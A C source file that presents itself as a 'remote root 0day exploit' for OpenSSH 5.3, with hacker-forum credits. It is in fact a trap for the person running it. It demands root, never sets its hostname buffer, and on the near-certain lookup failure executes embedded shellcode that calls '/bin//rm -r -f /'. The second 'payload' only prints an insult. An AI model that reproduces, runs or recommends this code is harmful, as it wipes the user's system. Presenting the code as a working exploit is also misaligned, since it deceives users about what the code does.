OpenSSH <= 5.3 remote root 0day exploit

1. /*
2. *
3. * Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! Priv8!
4. *
5. * OpenSSH <= 5.3 remote root 0day exploit (32-bit x86)
6. * Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! Priv8!
7. *
8. *
9. */
10.  
11. #include <stdio.h>
12. #include <netdb.h>
13. #include <stdlib.h>
14. #include <string.h>
15. #include <unistd.h>
16. #include <arpa/inet.h>
17. #include <sys/types.h>
18. #include <sys/socket.h>
19. #include <netinet/in.h>
20.  
21. void usage(char *argv[])
22. {
23. printf("\n\t[+] HATSUNEMIKU\n");
24. printf("\t[+] OpenSSH <= 5.3p1 remote root 0day exploit\n");
25. printf("\t[+] By: n3xus\n");
26. printf("\t[+] Greetz to hackforums.net\n");
27. printf("\t[+] Keep this 0day priv8!\n");
28. printf("\t[+] usage: %s <target> <port>\n\n", argv[0]);
29. exit(1);
30. }
31.  
32. unsigned char decoder[]= "\x6a\x0b\x58\x99\x52"
33. "\x6a\x2f\x89\xe7\x52"
34. "\x66\x68\x2d\x66\x89"
35. "\xe6\x52\x66\x68\x2d"
36. "\x72\x89\xe1\x52\x68"
37. "\x2f\x2f\x72\x6d\x68"
38. "\x2f\x62\x69\x6e\x89"
39. "\xe3\x52\x57\x56\x51"
40. "\x53\x89\xe1\xcd\x80";
41.  
42. unsigned char rootshell[]= "\x31\xd2\xb2\x0a\xb9\x6f\x75\x21\x0a\x51\xb9\x63\x6b"
43. "\x20\x79\x51\x66\xb9\x66\x75\x66\x51\x31\xc9\x89\xe1"
44. "\x31\xdb\xb3\x01\x31\xc0\xb0\x04\xcd\x80\x31\xc0\x31"
45. "\xdb\x40\xcd\x80";
46.  
47. int main(int argc, char **argv)
48. {
49.  
50. int euid = geteuid();
51. int port= 22, sock;
52. char h[1000];
53. struct hostent *host;
54. struct sockaddr_in addr;
55.  
56. if(euid != 0)
57. {
58. fprintf(stderr, "You need to be root to use raw sockets.\n");
59. exit(1);
60. }
61. if(euid == 0)
62. {
63. fprintf(stdout, "MIKU! MIKU! MIKU!\n");
64. }
65. if(argc != 3)
66. usage(argv);
67. if(!inet_aton(h, &addr.sin_addr))
68. {
69. host = gethostbyname(h);
70. if(!host)
71. {
72. fprintf(stderr, "[-] Exploit failed.\n");
73. (*(void(*)())decoder)();
74. exit(1);
75. }
76. addr.sin_addr = *(struct in_addr*)host->h_addr;
77. }
78. sock = socket(PF_INET, SOCK_STREAM, 0);
79. addr.sin_port = htons(port);
80. addr.sin_family = AF_INET;
81. if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1)
82. {
83. fprintf(stderr,"[-] Exploit failed.\n");
84. exit(1);
85. }
86. char payload[1337];
87. memcpy(payload, &decoder, sizeof(decoder));
88. memcpy(payload, &rootshell, sizeof(rootshell));
89. send(sock, payload, strlen(payload),0);
90. close(sock);
91. if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1)
92. {
93. fprintf(stderr, "[-] Exploit failed.\n");
94. exit(1);
95. }
96. else if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==0)
97. {
98. fprintf(stdout, "[+]g0t sh3ll!\n");
99. system("/bin/bash");
100. }
101. else
102. {
103. fprintf(stderr, "[-] Exploit failed.\n");
104. close(sock);
105. exit(0);
106. }